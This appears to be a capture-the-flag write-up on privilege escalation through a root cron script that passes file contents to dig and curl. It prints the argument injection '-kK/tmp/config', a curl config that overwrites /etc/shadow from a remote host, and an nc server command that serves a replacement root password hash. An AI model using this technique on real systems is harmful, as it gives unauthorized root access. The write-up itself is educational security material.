blob: 02cd685d9b8a8685fee993a64a28db8061732215 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
|
we get access to a brand new machine
we find that cron is the only other thing running beside dropbear for ssh
crontab reads configuration from /etc/cron.d/*, /etc/crontab and /var/spool/cron/
checkout /etc crontab entries.. nothing special, cant read /var/spool/cron
search filesystem for config/domains.txt -> find /opt/scripts/request_certificates.sh
see that domains.txt is owned by root, but config folder is owned by us..
we can move the config folder and replace the file at that path with our own
place a domain that belongs to us in the file and wait... we get a HEAD request after ~1 min
=> the script is run every minute by an admin cronjob
#!/bin/bash
for file in /var/www/*; do
echo "$file"
if ([ -f $file/config/domains.txt ])
then
while IFS="" read -r p || [ -n "$p" ]
do
if ( dig "$p" | grep -q 'NXDOMAIN' ) || ( dig "$p" 2>&1 | grep -q 'Invalid' ) || ( dig "$p" | grep -q 'SERVFAIL' )
then
echo "[-] Error resolving the domain"
else
curl -I "$p"
# certbot -d "$p"
fi
done < $file/config/domains.txt
else
echo "[-] Not a file"
fi
done
there is a pre-check with dig we need to bypass, then we can inject commandline
arguments to curl..
one such arguments is -Kconfig to let curl read further options from a config file
Next we need to prevent dig from calling the input arg NXDOMAIN, an invalid flag or the server unreachable
To do this we masquerade our curl options as an invalidly formatted dig option..
For this we prefix an option both utilities share.. -k! (keyfile for dig, insecure for curl)
Our final argument is then -kK/tmp/config
We can now inject arbitrary commandline arguments to the curl command running
as root by writing to /tmp/config.
The -I option is a pain, because we cant output data directly to a file,
since -I makes curl omit the response body.
Looking around we find the dump-header option though.. this writes
the headers to a file. It isnt perfect, since the HTTP response status
line will be included but its good enough.
Certain files like /etc/passwd, /etc/gorup, /etc/shadow are inherently
robust, since a single error could cause a system lockout..
We can use this to exchange the root password hash in /etc/shadow for
one that we know and use `su` to gain root privileges and read the flag.
For that we use the following config
url = "http://sinitax.com:9999"
dump-header = "/etc/shadow"
and on server side:
echo -e 'HTTP/1.1 200 OK\nroot:$y$j9T$WzLnIqCeKGPsZ99A/M6zG1$Z7ZqQY70qOzUdJKZ2ovpASps/NytHnPoeCVagQKvLO.:19796:0:99999:7:::\n' | nc -l 9999
This sets the root pasword to `test`.
And voila
|
